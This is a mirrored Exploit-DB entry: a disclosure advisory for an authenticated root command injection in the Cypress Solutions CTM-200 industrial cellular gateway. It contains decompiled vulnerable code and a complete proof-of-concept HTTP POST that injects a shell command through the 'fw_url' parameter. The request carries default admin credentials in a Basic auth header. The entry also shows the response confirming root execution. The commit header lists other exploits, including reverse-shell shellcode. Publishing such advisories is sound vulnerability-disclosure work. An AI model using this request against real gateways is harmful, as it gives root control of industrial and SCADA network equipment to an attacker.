bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/50408.txt
Offensive Security 679a62755b DB: 2021-10-14 
28 changes to exploits/shellcodes

Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)

Simple Payroll System 1.0 - SQLi Authentication Bypass

Dolibarr ERP/CRM 14.0.1 - Privilege Escalation

Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)

Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Budget and Expense Tracker System 1.0 - Arbitrary File Upload
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass
Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
Sonicwall SonicOS 7.0 - Host Header Injection

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
2021-10-14 05:02:11 +00:00

180 lines
No EOL
5.9 KiB
Text
Raw Permalink Blame History

# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca
Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
Vendor: Cypress Solutions Inc.
Product web page: https://www.cypress.bc.ca
Affected version: 2.7.1.5659
2.0.5.3356-184
Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
office and SCADA communications.
Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user
through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd
upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to
the wget command in /usr/bin/cmdmain ELF binary.
================================================================================================
/www/cgi-bin/webif/ctm-config-upgrade.sh:
-----------------------------------------
136: if ! empty "$FORM_install_fw_url"; then
137: echo "</pre>"
138: echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
139: cmd upgradefw "$FORM_fw_url"
140: unset FORM_install_fw_url FORM_submit
141: echo "</pre><br />Done."
142: fi
==================================================================
cmdmain (ELF):
memset(&DAT_0003bd1c,0,0x80);
make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
iVar3 = ctm_fopen(local_184,"r");
if (iVar3 == 0) {
uVar5 = *(undefined4 *)(iParm2 + 8);
__s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
goto LAB_0001f4a8;
}
ctm_fclose();
memset(local_184,0,0x100);
sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
=================================================================
cmd (ELF):
while (sVar1 = strlen(__s2), uVar7 < sVar1) {
__s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
__s2 = *ppcVar8;
uVar7 = uVar7 + 1;
}
uStack180 = 0x7273752f;
uStack176 = 0x6e69622f;
uStack172 = 0x646d632f;
uStack168 = 0x6d632f73;
uStack164 = 0x69616d64;
uStack160 = 0x6e;
uStack159 = 0;
iVar2 = execv((char *)&uStack180,ppcParm2);
================================================================================================
Tested on: GNU/Linux 2.6.32.25 (arm4tl)
BusyBox v1.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php
21.09.2021
--
PoC POST request:
-----------------
POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"
1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"
`id`
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"
Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"
------WebKitFormBoundaryZlABvwQnpLtpe9mM--
Response:
---------
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http: //www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http: //www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...
...
Firmware Management
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK
Done.
...
...
</div>
<br />
<fieldset id="save">
<legend><strong>Proceed Changes</strong></legend>
<div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
<ul class="apply">
<li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li>
</ul>
</fieldset>
</form>
<hr />
<div id="footer">
<h3>X-Wrt</h3>
<em>End user extensions for OpenWrt</em>
</div>
</div> <!-- End #container -->
</body>
</html>
Reference in a new issue View git blame Copy permalink